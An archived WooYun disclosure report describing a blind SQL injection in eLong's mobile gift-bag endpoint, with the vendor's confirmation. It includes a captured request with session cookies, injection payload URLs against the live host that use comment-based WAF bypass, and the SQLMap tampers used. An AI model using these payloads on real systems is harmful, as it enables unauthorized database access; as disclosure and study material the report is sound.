艺龙旅行官方APP存在SQL注入(含绕过)

  • A+
所属分类:乌云漏洞
摘要

2016-03-14: 细节已通知厂商并且等待厂商处理中
2016-03-16: 厂商已经确认,细节仅向厂商公开
2016-03-26: 细节向核心白帽子及相关领域专家公开
2016-04-05: 细节向普通白帽子公开
2016-04-15: 细节向实习白帽子公开
2016-04-30: 细节向公众公开

漏洞概要 关注数(14) 关注此漏洞

缺陷编号: WooYun-2016-184557

漏洞标题: 艺龙旅行官方APP存在SQL注入(含绕过)

相关厂商: 艺龙旅行网

漏洞作者: 路人甲

提交时间: 2016-03-14 15:37

公开时间: 2016-04-30 13:53

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: SQL注入

1人收藏

漏洞详情

披露状态:

2016-03-14: 细节已通知厂商并且等待厂商处理中
2016-03-16: 厂商已经确认,细节仅向厂商公开
2016-03-26: 细节向核心白帽子及相关领域专家公开
2016-04-05: 细节向普通白帽子公开
2016-04-15: 细节向实习白帽子公开
2016-04-30: 细节向公众公开

简要描述:

APP安全之SQL注入

详细说明:

目标:艺龙旅行Android APP

检测发现以下地方存在SQL注入:(注入参数activityId,布尔盲注)

code 区域
GET http://mhuodong.elong.com/giftbag/index?activityId=65698945-4ed7-4e70-9078-fae5a80c78fe&dref=syhbtp_hq HTTP/1.1
 Host: mhuodong.elong.com
 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Cookie: H5SessionId=47f57b95-3388-414f-a707-1e3af6cd86fd; H5Channel=ewhtml5%2cDefault; H5CookieId_s=caf99f05-a11b-4595-9700-93599cebaba2; H5CookieId=caf99f05-a11b-4595-9700-93599cebaba2; route=dde2df1a9ce9c2909cf80f80db02b305; Hm_lvt_a6bc45911d1a6843649fb7ba8676cc71=1457933090,1457935616; Hm_lpvt_a6bc45911d1a6843649fb7ba8676cc71=1457935616; Hm_lvt_2547ead1439a4e1d06c7eb9e330939fd=1457933091,1457935616; Hm_lpvt_2547ead1439a4e1d06c7eb9e330939fd=1457935616; TLTHID=EACDA8B642244E306D1690981C4082F0; TLTSID=35CF3A5344A041C6E80B868104C7C7E8; s_cc=true; s_sq=%5B%5BB%5D%5D; NSC_NCBQQEXOME_80=ffffffffaf1d13b445525d5f4f58455e445a4a4229a0
 Connection: keep-alive

Payload:

code 区域
http://mhuodong.elong.com/giftbag/index?activityId=65698945-4ed7-4e70-9078-fae5a80c78fe%27and%2F**%2F%27a%27%2F**%2Flike%2F**%2F%27a&dref=syhbtp_hq

 

code 区域
http://mhuodong.elong.com/giftbag/index?activityId=65698945-4ed7-4e70-9078-fae5a80c78fe%27and%2F**%2F%27a%27%2F**%2Flike%2F**%2F%27b&dref=syhbtp_hq

检测发现有WAF(过滤了等号和空格),使用SQLMap的两个Tamper即可应付equaltolike/space2comment

不过不知为啥SQLMap老是检测不出来,只好自己写了个Python……

漏洞证明:

1、跑出当前数据库用户

艺龙旅行官方APP存在SQL注入(含绕过)

2、跑出所有数据库

艺龙旅行官方APP存在SQL注入(含绕过)

修复方案:

请多指教~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2016-03-16 13:53

厂商回复:

已验证,感谢白帽子!

最新状态:

暂无


 

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

 

登陆后才能进行评分


评价

  1. 2016-03-14 15:48 | 穿墙人 ( 路人 | Rank:15 漏洞数:1 )

    1

    有人说 什么安全不安全的 凑合用呗 你继续吧

  2. 2016-03-14 17:56 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

    1

    嗯,不得了

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: